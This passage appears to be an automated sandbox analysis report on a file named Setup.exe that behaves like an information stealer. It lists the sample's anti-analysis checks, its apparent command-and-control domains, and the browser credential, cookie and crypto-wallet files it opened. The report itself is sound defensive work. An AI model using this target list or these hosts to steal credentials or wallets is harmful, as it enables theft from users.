              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: webio.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\Setup.exe Section loaded: profapi.dll
              Source: Setup.exe Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: Setup.exe Static file information: File size 76573072 > 1048576
              Source: Setup.exe Static PE information: section name: RT_CURSOR
              Source: Setup.exe Static PE information: section name: RT_BITMAP
              Source: Setup.exe Static PE information: section name: RT_ICON
              Source: Setup.exe Static PE information: section name: RT_MENU
              Source: Setup.exe Static PE information: section name: RT_DIALOG
              Source: Setup.exe Static PE information: section name: RT_STRING
              Source: Setup.exe Static PE information: section name: RT_ACCELERATOR
              Source: Setup.exe Static PE information: section name: RT_GROUP_ICON
              Source: Setup.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x174000
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_0078CB68 push 680078CBh; retf 0_3_0078CB6D
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_0078C264 pushad ; retn 0078h 0_3_0078C265
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_0078CB58 push esp; retf 0_3_0078CB59
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_0078C250 push eax; retn 0078h 0_3_0078C251
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_0078C254 push eax; retn 0078h 0_3_0078C255
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_0078CB47 push esp; retf 0_3_0078CB55
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_0078CA34 push 0C0078CAh; retf 0_3_0078CA51
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_007901A5 push eax; retf 0_3_007901C9
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_03568850 push es; iretd 0_3_03568869
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_0356AA6B push eax; retf 0_3_0356AAD9
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_03564E01 pushad ; retn 007Eh 0_3_03564E15
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_03568AC2 push ebp; iretd 0_3_03568AF1
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_03569884 pushad ; retn 007Eh 0_3_03569885
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_3_0356C08B pushad ; retn 007Eh 0_3_0356C095
              Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Setup.exe System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\Setup.exe TID: 2720 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\Setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Setup.exe, 00000000.00000002.4119245539.0000000000761000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
              Source: Setup.exe, Setup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120119900.0000000002800000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: uXYiKnvCU8wQCIU7UgfhKoKRPsuCptaN1Fo7+6eVHFnXGUtZAqEmuGRt7xUhb45a
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120119900.0000000002800000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: uXYiKnvCU8wQCIU7UgfhKoKRPsuCptaN1Fo7+6eVHFnXGUtZAqEmuGRt7xUhb45a"
              Source: C:\Users\user\Desktop\Setup.exe Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: cloudewahsj.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: rabidcowse.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: noisycuttej.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: tirepublicerj.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: framekgirus.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: wholersorie.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: abruptyopsn.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: nearycrepso.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: sloppymisskr.click
              Source: C:\Users\user\Desktop\Setup.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Setup.exe, 00000000.00000003.1902962839.00000000035A5000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1902962839.0000000003594000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: Process Memory Space: Setup.exe PID: 6860, type: MEMORYSTR
              Source: Yara match File source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: Setup.exe String found in binary or memory: %appdata%\Electrum-LTC\wallets
              Source: Setup.exe String found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Setup.exe String found in binary or memory: Jaxx Liberty
              Source: Setup.exe String found in binary or memory: window-state.json
              Source: Setup.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Setup.exe String found in binary or memory: Wallets/Ethereum
              Source: Setup.exe String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: Setup.exe String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
